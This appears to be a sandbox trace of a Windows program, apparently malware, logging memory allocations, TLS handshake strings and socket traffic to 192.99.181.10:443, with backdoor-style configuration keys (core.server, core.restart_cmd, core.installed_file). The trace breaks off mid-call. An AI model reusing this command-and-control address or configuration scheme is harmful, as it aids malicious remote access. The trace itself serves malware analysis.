0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.107] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.108] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.108] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.108] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.108] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.108] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.108] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.108] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.108] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.108] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x64495118 [0044.108] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x2c7925eb [0044.108] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x6779d5a5 [0044.108] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x639abb50 [0044.108] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x26cb32b8 [0044.108] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x2b3be507 [0044.108] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x4d08e33d [0044.108] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x18f4929b [0044.108] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x2f7ee785 [0044.108] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x3600238b [0044.108] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x3dbd4bc2 [0044.108] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x6c90c1a1 [0044.108] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x421ac68e [0044.108] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x6214ad3f [0044.108] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x600dff70 [0044.108] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x2e49644d [0044.108] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x673610e [0044.108] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x691b3862 [0044.108] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x6f4ea190 [0044.108] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x77872dd7 [0044.108] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x54f7ba7a [0044.108] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x5a26066a [0044.108] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x328fa89a [0044.108] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x111e9c29 [0044.108] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x2f7e789d [0044.109] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x4642d12d [0044.109] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x2f0c4ffa [0044.109] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x3115e3fc [0044.109] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x5f9e7b50 [0044.109] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x6a9620a0 [0044.109] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x4fb7fe6d [0044.109] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x15a9e93 [0044.109] calloc (_Count=0x8, _Size=0x4) returned 0x2600448 [0044.109] calloc (_Count=0x10, _Size=0x4) returned 0x261f9b8 [0044.109] calloc (_Count=0x10, _Size=0x4) returned 0x261fa00 [0044.109] calloc (_Count=0x8, _Size=0x4) returned 0x2600470 [0044.109] calloc (_Count=0x8, _Size=0x4) returned 0x2600470 [0044.109] calloc (_Count=0x8, _Size=0x4) returned 0x2600470 [0044.109] calloc (_Count=0x8, _Size=0x4) returned 0x2600470 [0044.109] calloc (_Count=0x8, _Size=0x4) returned 0x2600470 [0044.109] calloc (_Count=0x10, _Size=0x24) returned 0x26209a0 [0044.109] calloc (_Count=0x8, _Size=0x4) returned 0x2600470 [0044.109] calloc (_Count=0x8, _Size=0x4) returned 0x2600498 [0044.109] calloc (_Count=0x1, _Size=0x4) returned 0x2fa78 [0044.109] calloc (_Count=0x8, _Size=0x4) returned 0x26004c0 [0044.109] calloc (_Count=0x8, _Size=0x4) returned 0x26004e8 [0044.109] calloc (_Count=0x1, _Size=0x4) returned 0x2fa68 [0044.109] calloc (_Count=0x2, _Size=0x4) returned 0x2fa88 [0044.109] calloc (_Count=0x10, _Size=0x4) returned 0x261fa00 [0044.109] calloc (_Count=0x8, _Size=0x4) returned 0x2600510 [0044.109] calloc (_Count=0x8, _Size=0x4) returned 0x2600538 [0044.109] calloc (_Count=0x8, _Size=0x4) returned 0x2600560 [0044.109] calloc (_Count=0x8, _Size=0x4) returned 0x2600560 [0044.109] calloc (_Count=0x9, _Size=0x4) returned 0x261f580 [0044.109] calloc (_Count=0x10, _Size=0x4) returned 0x261f9b8 [0044.109] calloc (_Count=0x10, _Size=0x4) returned 0x261fa48 [0044.109] calloc (_Count=0x8, _Size=0x4) returned 0x2600538 [0044.109] calloc (_Count=0x8, _Size=0x4) returned 0x2600538 [0044.110] calloc (_Count=0x8, _Size=0x4) returned 0x2600538 [0044.110] calloc (_Count=0x8, _Size=0x4) returned 0x2600538 [0044.110] calloc (_Count=0x8, _Size=0x4) returned 0x2600538 [0044.110] calloc (_Count=0x8, _Size=0x4) returned 0x2600538 [0044.110] calloc (_Count=0x10, _Size=0x4) returned 0x261fa48 [0044.110] calloc (_Count=0x8, _Size=0x4) returned 0x2600510 [0044.110] calloc (_Count=0x8, _Size=0x4) returned 0x2600560 [0044.110] calloc (_Count=0x9, _Size=0x4) returned 0x261f580 [0044.110] calloc (_Count=0x10, _Size=0x4) returned 0x261f9b8 [0044.110] calloc (_Count=0x8, _Size=0x4) returned 0x2600510 [0044.110] calloc (_Count=0x8, _Size=0x4) returned 0x2600510 [0044.110] calloc (_Count=0x8, _Size=0x4) returned 0x2600510 [0044.110] calloc (_Count=0x8, _Size=0x4) returned 0x2600510 [0044.110] calloc (_Count=0x10, _Size=0x4) returned 0x261fa00 [0044.110] calloc (_Count=0x8, _Size=0x4) returned 0x2600560 [0044.110] calloc (_Count=0x8, _Size=0x4) returned 0x2600560 [0044.110] calloc (_Count=0x8, _Size=0x4) returned 0x2600560 [0044.110] calloc (_Count=0x8, _Size=0x4) returned 0x2600560 [0044.110] calloc (_Count=0x8, _Size=0x4) returned 0x2600560 [0044.110] calloc (_Count=0x8, _Size=0x4) returned 0x2600560 [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x732e2b54 [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x755e9478 [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x65d637a8 [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x34b639f2 [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x2900871f [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0xab48f72 [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0xf454fb8 [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x763269d5 [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x189e4bfa [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x192c353e [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x74d97781 [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x47af2515 [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x585ccbd5 [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x2d32f7f7 [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x66417ccd [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x172fb3d2 [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x30aba076 [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x66fc04ae [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x72f44d6 [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x6875aa36 [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x6b635f23 [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x7f8bdafb [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x7286699d [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x60c1df42 [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x49293662 [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x4b73f62 [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x172ca442 [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x4c0506c5 [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x137d5a45 [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x48c626fe [0044.112] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x65d85ec4 [0044.113] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x4d2df0c5 [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x7456b528 [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x7112b3f1 [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x6a87910e [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x65d7f50d [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x46fc0827 [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x125f5219 [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x5b2067e1 [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x53939ac1 [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x2708add4 [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x2f1e7626 [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x58feea53 [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x8ac5a59 [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x5d3885c0 [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x7f59f51f [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x5b7c70f6 [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x8399ed8 [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x1680d9e0 [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x13b2536d [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x20ac48e4 [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x17cdf6bb [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x40280a34 [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x3c40a307 [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x1507eb72 [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x99947f3 [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x54c716d5 [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x494536f5 [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x11b74eaf [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x582d0070 [0044.115] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x2dda407a [0044.116] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x2d94e907 [0044.116] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x64de06b9 [0044.116] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x6dd7379 [0044.117] strlen (_Str="master secret") returned 0xd [0044.117] strlen (_Str="key expansion") returned 0xd [0044.117] strlen (_Str="client finished") returned 0xf [0044.117] GetCurrentThreadId () returned 0xac0 [0044.117] WSASend (in: s=0x214, lpBuffers=0x516fec4*=((len=0x4b, buf=0x2621400*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fec4*=((len=0x4b, buf=0x2621400*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0044.117] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0044.117] GetCurrentThreadId () returned 0xac0 [0044.117] WSASend (in: s=0x214, lpBuffers=0x516fef0*=((len=0x6, buf=0x2fa68*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fef0*=((len=0x6, buf=0x2fa68*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0044.118] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0044.118] GetCurrentThreadId () returned 0xac0 [0044.118] WSASend (in: s=0x214, lpBuffers=0x516fef0*=((len=0x2d, buf=0x261f710*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fef0*=((len=0x2d, buf=0x261f710*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0044.118] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0044.118] GetCurrentThreadId () returned 0xac0 [0044.118] WSARecv (in: s=0x214, lpBuffers=0x516fefc, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fefc*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0044.118] GetLastError () returned 0x3e5 [0044.118] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0044.350] calloc (_Count=0x1, _Size=0xd0) returned 0x26237b8 [0044.350] strlen (_Str="server finished") returned 0xf [0044.350] calloc (_Count=0x1, _Size=0x6c) returned 0x2622400 [0044.350] calloc (_Count=0x2, _Size=0x40) returned 0x2e378 [0044.350] strlen (_Str="192.99.181.10") returned 0xd [0044.351] GetSystemTime (in: lpSystemTime=0x516fdb0 | out: lpSystemTime=0x516fdb0*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x30, wMilliseconds=0x36)) [0044.351] GetSystemTime (in: lpSystemTime=0x516fdb0 | out: lpSystemTime=0x516fdb0*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x30, wMilliseconds=0x36)) [0044.351] calloc (_Count=0x40, _Size=0x4) returned 0x26196a0 [0044.351] calloc (_Count=0x41, _Size=0x4) returned 0x261d598 [0044.351] calloc (_Count=0x41, _Size=0x4) returned 0x261d6b0 [0044.351] calloc (_Count=0x82, _Size=0x4) returned 0x26209a0 [0044.351] calloc (_Count=0x1, _Size=0x4) returned 0x2fa58 [0044.351] calloc (_Count=0x81, _Size=0x4) returned 0x2617a20 [0044.351] calloc (_Count=0x81, _Size=0x4) returned 0x2617c30 [0044.351] calloc (_Count=0x40, _Size=0x4) returned 0x26196a0 [0044.351] calloc (_Count=0x83, _Size=0x4) returned 0x2617e40 [0044.351] calloc (_Count=0x2, _Size=0x4) returned 0x2fa58 [0044.351] calloc (_Count=0x3, _Size=0x4) returned 0x26058f0 [0044.351] calloc (_Count=0x41, _Size=0x4) returned 0x261d7c8 [0044.351] calloc (_Count=0x81, _Size=0x4) returned 0x2618058 [0044.351] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.351] calloc (_Count=0x3, _Size=0x4) returned 0x2605908 [0044.351] calloc (_Count=0x42, _Size=0x4) returned 0x261d7c8 [0044.351] calloc (_Count=0x81, _Size=0x4) returned 0x2623890 [0044.351] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.351] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.351] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.351] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.351] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.351] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.352] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.353] calloc (_Count=0x2, _Size=0x4) returned 0x2fa78 [0044.354] GetSystemTime (in: lpSystemTime=0x516fdb0 | out: lpSystemTime=0x516fdb0*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x30, wMilliseconds=0x36)) [0044.354] GetSystemTime (in: lpSystemTime=0x516fdb0 | out: lpSystemTime=0x516fdb0*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x30, wMilliseconds=0x36)) [0044.354] GetSystemTime (in: lpSystemTime=0x516fdb0 | out: lpSystemTime=0x516fdb0*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x30, wMilliseconds=0x36)) [0044.354] GetSystemTime (in: lpSystemTime=0x516fdb0 | out: lpSystemTime=0x516fdb0*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x30, wMilliseconds=0x36)) [0044.354] CryptAcquireContextW (in: phProv=0x2fa78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2fa78*=0x2c4c958) returned 1 [0044.354] CryptAcquireContextW (in: phProv=0x2fa78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2fa78*=0x2c4cbf8) returned 1 [0044.355] CryptCreateHash (in: hProv=0x2c4cbf8, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x2fa7c | out: phHash=0x2fa7c) returned 1 [0044.355] CryptHashData (hHash=0x2c405f8, pbData=0x2619218, dwDataLen=0x35a, dwFlags=0x0) returned 1 [0044.355] CryptGetHashParam (in: hHash=0x2c405f8, dwParam=0x4, pbData=0x516fe60, pdwDataLen=0x516fe64, dwFlags=0x0 | out: pbData=0x516fe60, pdwDataLen=0x516fe64) returned 1 [0044.355] CryptGetHashParam (in: hHash=0x2c405f8, dwParam=0x2, pbData=0x26011f0, pdwDataLen=0x516fe64, dwFlags=0x0 | out: pbData=0x26011f0, pdwDataLen=0x516fe64) returned 1 [0044.355] CryptDestroyHash (hHash=0x2c405f8) returned 1 [0044.355] CryptReleaseContext (hProv=0x2c4cbf8, dwFlags=0x0) returned 1 [0044.355] getpeername (in: s=0x214, name=0x2605c5c, namelen=0x2605c6c | out: name=0x2605c5c*(sa_family=2, sin_port=0x1bb, sin_addr="192.99.181.10"), namelen=0x2605c6c) returned 0 [0044.355] ResetEvent (hEvent=0x1ec) returned 1 [0044.355] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x22c [0044.355] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x230 [0044.355] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x234 [0044.355] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4dd58fc, lpParameter=0x261f710, dwCreationFlags=0x0, lpThreadId=0x261f718 | out: lpThreadId=0x261f718*=0xac8) returned 0x238 [0044.356] strlen (_Str="core.token") returned 0xa [0044.356] strlen (_Str="core.token") returned 0xa [0044.356] strlen (_Str="core.token") returned 0xa [0044.356] strlen (_Str="core.token") returned 0xa [0044.356] strlen (_Str="core.token") returned 0xa [0044.356] strlen (_Str="core.token") returned 0xa [0044.356] WaitForSingleObject (hHandle=0x1ec, dwMilliseconds=0x0) returned 0x102 [0044.356] GetCurrentThreadId () returned 0xac0 [0044.356] WSASend (in: s=0x214, lpBuffers=0x516fe0c*=((len=0x77, buf=0x26238a8*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fe0c*=((len=0x77, buf=0x26238a8*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0044.356] GetCurrentThreadId () returned 0xac0 [0044.357] SetEvent (hEvent=0x1e8) returned 1 [0044.357] GetCurrentThreadId () returned 0xac0 [0044.357] strlen (_Str="core.server") returned 0xb [0044.357] strlen (_Str="core.server") returned 0xb [0044.357] strlen (_Str="core.server") returned 0xb [0044.357] strlen (_Str="core.server") returned 0xb [0044.357] strlen (_Str="core.server") returned 0xb [0044.357] strlen (_Str="core.server") returned 0xb [0044.357] strlen (_Str="core.server") returned 0xb [0044.357] strlen (_Str="core.server") returned 0xb [0044.357] strlen (_Str="core.server") returned 0xb [0044.357] strlen (_Str="core.server") returned 0xb [0044.357] strlen (_Str="core.server") returned 0xb [0044.357] strlen (_Str="core.server") returned 0xb [0044.357] strlen (_Str="192.99.181.10:443") returned 0x11 [0044.357] strcmp (_Str1="core.server", _Str2="core.crash_handler") returned 1 [0044.357] strcmp (_Str1="core.server", _Str2="core.installed_file") returned 1 [0044.357] strcmp (_Str1="core.server", _Str2="core.restart_cmd") returned 1 [0044.357] strcmp (_Str1="core.server", _Str2="core.servers") returned -1 [0044.357] strcmp (_Str1="core.server", _Str2="core.cert_fp") returned 1 [0044.357] strlen (_Str="core.server") returned 0xb [0044.357] strlen (_Str="192.99.181.10:443") returned 0x11 [0044.357] strlen (_Str="core") returned 0x4 [0044.357] strlen (_Str="core") returned 0x4 [0044.359] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 